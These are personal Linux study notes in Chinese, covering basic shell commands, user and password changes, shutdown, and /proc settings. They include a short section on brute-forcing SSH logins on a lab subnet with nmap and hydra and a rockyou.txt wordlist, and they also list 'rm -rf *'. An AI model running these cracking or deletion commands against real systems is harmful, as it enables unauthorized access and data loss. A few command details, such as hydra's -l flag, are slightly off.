| 符號 | 意義 |
|---|---|
| $ | 一般使用者 |
| # | 超級使用者 |
| ~ | 代表home directory |
指令 [參數] [選項],中誇號帶表可以有也可以沒有
ls:列出資料夾下的內容ls -l test.txt: 顯示test.txt的詳細訊息ls -l -h test.txt: -h可以把檔案大小變成以K為單位ls -a: 可以顯示隱藏檔案,如果是隱藏檔案前面會有 . , -a和 –all是一樣的ls -alh /home : 查看home下面的所有檔案,前面的指令可以連在一起變成超級使用者可以切換成各種使用者
su - user、su - tom
echo "12345678" | passwd --stdin tom: 修改tom 的密碼
ctrl+Alt+f1,可以進入虛擬終端機,可以使用f1~f6
shutdown -h +10: 十分鐘後關機、shutdown -r +10: 十分鐘後重新開機
rm -rf *: 所有檔案資料刪除(remove recursive force)
使用ls -l查看,可以發現前面第一個字有c和b,分別代表終端設備(c)和區塊設備(b)
指令修改硬體檔案
cd /proc
cat cpuinfo ## 查看CPU資訊
cd /proc/sys/net/ipv4
cat /ip_forward ## 可以查看有沒有路由功能(1是有,0沒有)
## 所以可以使用下面指令達到開啟和關閉熱點
echo 1 > /proc/sys/net/ipv4/ip_forward ## 開啟
echo 0 > /proc/sys/net/ipv4/ip_forward ## 關閉
SSH: https://null-byte.wonderhowto.com/how-to/gain-ssh-access-servers-by-brute-forcing-credentials-0194263/
可以使用單人模式進行破解
但我們這裡使用nmap和hydra進行破解
nmap: 可以獲得虛擬機的資訊
hydra: 可以對帳號密碼使用暴力破解,不過需要提供字典,可以上網使用rockyou.txt
sudo apt-get install nmap ## 安裝套件,centos 使用 yum install nmap
nmap -A 192.168.157.0/24 ## 對目前的區域網路進行掃瞄,會拿到有連線到目前區域的IP(192.168.157.128)
ssh user1@192.168.157.128 ## 需要使用者帳密
sudo apt install hydra ## 安裝套件
hydra -l user.txt -P passwords.txt -t 4 192.168.157.128 ssh ## -t代表開4個線程,比較快
上面hydra可以遠端破解,可以把user.txt檔案裏面的user使用password.txt暴力破解
whoami: 可以顯示目前是誰在使用who: 查詢目前有誰在系統上(顯示登入時的身分),也可以用 w,
pts,代表是使用putty這種類型的連接,顯示tty,代表是使用本身機器裡面的終端機fg,把背景的工作拿到前面來pwd: 顯示目前位置,也可以使用echo &PWDcd ~: 回到家目錄echo $SHELL: 查看當前在使用的shell (bash、powershell、tcsh…)man+command: 顯示指令的完整內容,man代表手冊